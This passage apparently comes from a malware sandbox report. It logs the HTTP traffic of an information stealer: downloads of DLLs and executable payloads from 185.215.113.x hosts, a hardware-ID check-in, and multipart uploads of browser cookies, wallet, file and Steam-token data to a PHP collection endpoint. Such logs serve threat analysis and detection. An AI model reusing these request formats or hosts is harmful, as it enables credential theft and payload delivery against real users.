6b 79 49 45 4e 51 56 53 41 32 4e 6a 41 77 49 45 41 67 4d 69 34 30 4d 43 42 48 53 48 6f 4b 43 53 30 67 51 32 39 79 5a 58 4d 36 49 44 49 4b 43 53 30 67 56 47 68 79 5a 57 46 6b 63 7a 6f 67 4e 41 6f 4a 4c 53 42
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------BAFBFCBGHDGCFHJJECAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 2d 2d 0d 0a Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="file"------DBFCBGCGIJKJKECAKEGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 2d 2d 0d 0a Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file"------JKECGDBFCBKFIDHIDHDH--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="message"wallets------DHCBGDHIEBFHCBFHDHDH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="message"files------BGIDBKKKKKFBGDGDHIDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file"------JEGHCBAFBFHIIECBKFCG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="message"ybncbhylepme------EHCGIJDHDGDBGDGCGCFH--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005695001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 05:07:27 GMTIf-None-Match: "6732e28f-1bb600"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 2d 2d 0d 0a Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build"mars------AEHIJDAFBKFHIDGCFBFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 36 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005696031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005697001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build"mars------DBKKFHIEGDHJKECAAKKE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 2d 2d 0d 0a Data Ascii: ------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="build"mars------BKKFCFBKFCFBFIDGCGDH--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
